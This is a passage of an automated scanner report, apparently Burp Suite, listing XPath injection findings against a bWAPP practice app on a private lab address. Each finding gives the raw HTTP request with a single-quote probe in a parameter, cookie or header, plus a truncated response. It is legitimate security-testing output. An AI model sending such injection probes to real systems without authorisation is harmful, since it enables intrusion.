Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.101. http://192.168.52.147/bWAPP/bof_2.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:16 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.102. http://192.168.52.147/bWAPP/bof_2.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12971

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.103. http://192.168.52.147/bWAPP/bof_2.php [movie_genre cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The movie_genre cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the movie_genre cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:12 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.104. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.105. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:33 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.106. http://192.168.52.147/bWAPP/bof_2.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.107. http://192.168.52.147/bWAPP/bof_2.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:13:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.108. http://192.168.52.147/bWAPP/bof_2.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:15:44 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12968

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.109. http://192.168.52.147/bWAPP/clickjacking.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.110. http://192.168.52.147/bWAPP/clickjacking.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:33:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.111. http://192.168.52.147/bWAPP/clickjacking.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:20:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.112. http://192.168.52.147/bWAPP/clickjacking.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:49 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.113. http://192.168.52.147/bWAPP/clickjacking.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.114. http://192.168.52.147/bWAPP/clickjacking.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:16:51 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.115. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php?1'=1 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.116. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F

form_security_level=submit&security_level=1&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: DENY
Connection: close
Content-Type: text/html
Content-Length: 13404

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.117. http://192.168.52.147/bWAPP/clickjacking.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/clickjacking.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/clickjacking.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/clickjacking.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:17:35 GMT
